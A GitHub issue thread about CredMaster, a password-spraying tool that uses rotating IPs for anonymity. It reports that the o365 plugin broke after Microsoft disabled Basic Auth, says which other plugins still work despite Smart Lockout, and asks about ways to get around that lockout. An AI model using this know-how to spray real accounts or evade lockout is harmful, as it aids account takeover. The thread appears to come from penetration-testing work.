search

knavesec / CredMaster

Refactored & improved CredKing password spraying tool, uses FireProx APIs to rotate IP addresses, stay anonymous, and beat throttling
926 stars 120 forks source link

o365 plugin does not work anymore #68

Closed TwistedSim closed 6 months ago

TwistedSim commented 10 months ago

Hello,

I recently found out the the o365 module uses the autodiscover login (https://autodiscover-s.outlook.com) with BasicAuth to do the spraying. Recently, Microsoft have block Basic Auth authentication on all tenant (see https://learn.microsoft.com/en-us/exchange/clients-and-mobile-in-exchange-online/deprecation-of-basic-authentication-exchange-online).

Is there plans to change the login method used by the module to fix this ?

Thanks

alecmoran1 commented 10 months ago

Interesting. I opened a similar issue: https://github.com/knavesec/CredMaster/issues/67. Do you think what I am seeing is because of what actually Microsoft implemented?

kpomeroy1979 commented 9 months ago

Confirming here that with valid creds Credmaster still says authentication failed using the o365 plugin.

TwistedSim commented 9 months ago

I think the best alternative is to use the MSOL plugin.

LukeLauterbach commented 9 months ago

The MSOL and AzureSSO plugins still work. However, both trigger Smart Lockout after about 10 failed logins, which the o365 plugin did not. It's a shame; it appears the era of easy Microsoft spraying are over (unless anyone else has found a way to bypass Smart Lockout that I've missed).

knavesec commented 9 months ago

Hey everyone, you're all correct, it does appear that the o365 plugin is dead, may it rest in peace. I'll update the docs and plugin details to reflect this and close this issue when complete

knavesec commented 6 months ago

Tagging all those above: @TwistedSim @alecmoran1 @LukeLauterbach @kpomeroy1979 @TheToddLuci0

Would the community prefer this plugin be simply removed, have a big "WARNING" sign upon running (but still running as usual), or just run with an error message stating "this plugin is no longer supported, see MS docs: here"

TwistedSim commented 6 months ago

According to Microsoft, no one can enable the Basic Authentication on any tenant:

Now no one (you or Microsoft support) can re-enable Basic authentication in your tenant

Not sure it's worth keeping since it should not work on any tenant.

knavesec commented 6 months ago

Repo updated to remove the o365 plugin. o365enum still works so nothing touched there cf21775 https://github.com/knavesec/CredMaster/wiki/O365